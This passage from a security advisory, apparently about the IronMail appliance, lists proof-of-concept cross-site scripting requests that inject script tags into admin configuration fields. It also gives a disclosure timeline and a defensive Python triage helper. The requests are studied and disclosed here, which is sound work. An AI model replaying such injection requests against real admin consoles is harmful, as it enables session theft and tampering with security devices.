%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #14 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #15 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #16 ] :.

POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ TIMELINE ] :.

22/Mar/2007 - We publish the advisory.
07/Mar/2007 - Second contact. Provider didn't answer.
27/Feb/2007 - First contact with provider.
19/Feb/2007 - Vulnerabilities found.
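Added example (not part of the original advisory, and not IronMail code): a triage helper that decodes a constructed excerpt of the XSS #17 body from its quoted-printable mail form, flags fields whose values carry HTML metacharacters, checks them server-side against the range the form itself declares in attrValidate, and returns the entity-escaped text a page must emit when echoing them. Reading "[1-65535]" as an inclusive integer range is an assumption, as are the function names.

```python
import html
import quopri
import re
from urllib.parse import parse_qsl

# Constructed sample: excerpt of the XSS #17 body for rows[2], kept in the
# quoted-printable form of the archived mail ("=3D" is "=", "=\n" a soft break).
ARCHIVED_BODY = (
    b"rows%5B2%5D.attrName=3Dshm_timeout&rows%5B2%5D.attrValidate=3D%5B1-65535%5D&=\n"
    b"rows%5B2%5D.attrValueStrClone=3D100&rows%5B2%5D.attrValu=\n"
    b"eStr=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submitValue=3DSubmit"
)

HTML_META = re.compile(r"[<>\"'&]")      # can leave an attribute or text node
RANGE = re.compile(r"\[(\d+)-(\d+)\]")   # assumed meaning: inclusive integer range


def decode_form(qp_bytes):
    """Undo the mail transfer encoding, then the form URL encoding."""
    raw = quopri.decodestring(qp_bytes).decode("ascii")
    return dict(parse_qsl(raw, keep_blank_values=True))


def in_declared_range(value, rule):
    """Server-side check of a value against an attrValidate-style rule."""
    m = RANGE.fullmatch(rule)
    if not m:
        return True                       # no range rule declared for this field
    return value.isdecimal() and int(m[1]) <= int(value) <= int(m[2])


def review(qp_bytes):
    """Return {field: (passes_range_check, escaped_value)} for risky fields."""
    form = decode_form(qp_bytes)
    findings = {}
    for name, value in form.items():
        if not HTML_META.search(value):
            continue
        # rows[2].attrValueStr is governed by rows[2].attrValidate
        rule = form.get(name.rsplit(".", 1)[0] + ".attrValidate", "")
        findings[name] = (in_declared_range(value, rule),
                          html.escape(value, quote=True))
    return findings


if __name__ == "__main__":
    for field, (ok, escaped) in review(ARCHIVED_BODY).items():
        print(field, "in range" if ok else "REJECT", "| echo as:", escaped)
```

The range rule travels in the request itself, so it only helps when the server re-checks it; escaping on output is what stops the value from closing the attribute it is echoed into.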